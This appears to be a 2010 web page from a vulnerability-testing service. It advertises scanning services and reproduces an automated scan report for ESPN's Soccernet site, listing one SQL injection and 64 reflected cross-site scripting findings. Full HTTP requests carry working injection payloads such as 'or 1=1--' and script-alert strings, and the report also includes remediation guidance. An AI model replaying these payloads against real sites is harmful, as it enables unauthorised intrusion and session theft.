Contractor for Hire: Per Minute, Per Day, Bounty Hunting
Example #1: Automated Vulnerability Crawler: $1/min, max charge is US $10 for 200 URL + 10 Params for CWE-79, CWE-89 and CWE-113 (XSS, SQL Injection and HTTP Header Injection).
Example #2: Hybrid Risk Analysis: $2/min, max charge is US $30 for 200 URL + 10 Params, Manual Testing of High Value URI/Param targets.
Example #3: Penetration Testing: Individual Case Basis, use Live Chat for a Quote.
Example #4:
Report generated by XSS.CX at Sat Nov 13 20:12:03 CST 2010.
Cross Site Scripting Reports | Hoyt LLC Research
1. SQL injection
2. Cross-site scripting (reflected)
2.1. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]
2.2. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]
2.3. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]
2.4. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]
2.5. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]
2.6. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]
2.7. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]
2.8. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]
2.9. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]
2.10. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]
2.11. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]
2.12. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [name of an arbitrarily supplied request parameter]
2.13. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [REST URL parameter 6]
2.14. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]
2.15. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [REST URL parameter 6]
2.16. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]
2.17. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [REST URL parameter 6]
2.18. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]
2.19. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [REST URL parameter 6]
2.20. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]
2.21. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [REST URL parameter 6]
2.22. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]
2.23. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [REST URL parameter 6]
2.24. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]
2.25. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [REST URL parameter 6]
2.26. http://soccernet.espn.go.com/worldcup2010/team/_/team/449/netherlands [name of an arbitrarily supplied request parameter]
2.27. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]
2.28. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]
2.29. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]
2.30. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]
2.31. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]
2.32. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]
2.33. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]
2.34. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]
2.35. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]
2.36. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]
2.37. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]
2.38. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]
2.39. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]
2.40. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]
2.41. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]
2.42. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]
2.43. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]
2.44. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]
2.45. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]
2.46. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]
2.47. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]
2.48. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]
2.49. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]
2.50. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]
2.51. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [REST URL parameter 6]
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]
2.53. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [REST URL parameter 6]
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]
2.55. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [REST URL parameter 6]
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/628/australia [name of an arbitrarily supplied request parameter]
2.57. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]
2.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]
2.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]
2.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]
1. SQL injection
Summary
Severity: High
Confidence: Tentative
Host: http://soccernet.espn.go.com
Path: /section
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94625683'%20or%201%3d1--%20 and 94625683'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
- Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /section HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94625683'%20or%201%3d1--%20
Connection: close
Response 1 (redirected)
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Tue, 09 Nov 2010 13:58:26 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 09 Nov 2010 13:48:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Set-Cookie: SWID=E55816DF-0795-44DF-82E3-4C3EDCA1BCC0; path=/; expires=Tue, 09-Nov-2030 13:58:26 GMT; domain=.go.com;
Cache-Expires: Tue, 09 Nov 2010 13:53:10 GMT
Content-Length: 86414
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script>/*c: null*/functi ...[SNIP]... <td style="padding-left: 5px; text-align: left; width: 70%;" colspan="3">Italian Serie A</td></tr> <tr align="right" class="colhead"><td style="padding-left: 5px; text-align: left; width: 70%;">November 8, 2010</td> <td width="20%" align="center">P</td> <td width="10%" align="center">Pts</td> </tr> <tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=112&cc=null">Lazio</a></td><td align="center">10</td><td align="center">22</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=103&cc=null">AC Milan</a></td><td align="center">10</td><td align="center">20</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=110&cc=null">Internazionale</a></td><td align="center">10</td><td align="center">19</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=111&cc=null">Juventus</a></td><td align="center">10</td><td align="center">18</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=114&cc=null">Napoli</a></td><td align="center">10</td><td align="center">18</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=2734&cc=null">Sampdoria</a></td><td align="center">10</td><td align="center">15</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=104&cc=null">AS Roma</a></td><td align="center">10</td><td align="center">15</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; 
text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=2923&cc=null">Palermo</a></td><td alig ...[SNIP]...
Request 2
GET /section HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94625683'%20or%201%3d2--%20
Connection: close
Response 2 (redirected)
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Tue, 09 Nov 2010 13:58:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Tue, 09 Nov 2010 13:53:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Set-Cookie: SWID=AE43D05F-46B0-474A-9F02-A5DE8709CEC7; path=/; expires=Tue, 09-Nov-2030 13:58:27 GMT; domain=.go.com;
Cache-Expires: Tue, 09 Nov 2010 13:58:13 GMT
Content-Length: 86472
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script>/*c: null*/functi ...[SNIP]... <td style="padding-left: 5px; text-align: left; width: 70%;" colspan="3">French Ligue 1</td></tr> <tr align="right" class="colhead"><td style="padding-left: 5px; text-align: left; width: 70%;">November 9, 2010</td> <td width="20%" align="center">P</td> <td width="10%" align="center">Pts</td> </tr> <tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=6997&cc=null">Brest</a></td><td align="center">12</td><td align="center">21</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=169&cc=null">Stade Rennes</a></td><td align="center">11</td><td align="center">20</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=160&cc=null">Paris Saint-Germain </a></td><td align="center">12</td><td align="center">19</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=176&cc=null">Marseille</a></td><td align="center">11</td><td align="center">18</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=166&cc=null">Lille</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="evenrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=178&cc=null">St Etienne</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="oddrow" align="right"> <td style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=179&cc=null">Toulouse</a></td><td align="center">12</td><td align="center">18</td></tr><tr class="evenrow" align="right"> <td 
style="padding-left: 5px; text-align: left; width: 70%"><a href="http://soccernet.espn.go.com/team?id=274&cc=null">Montpellier</a ...[SNIP]...
2. Cross-site scripting (reflected)
There are 64 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://soccernet.espn.go.com
Path: /world-cup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 12:56:45 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com;
Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT
Content-Length: 71086
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.2. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://soccernet.espn.go.com
Path: /worldcup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=120
Date: Sat, 06 Nov 2010 23:04:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT
Content-Length: 71086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.3. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/162/italy
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT
Content-Length: 81049
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit"> ...[SNIP]...
2.4. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/162/italy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
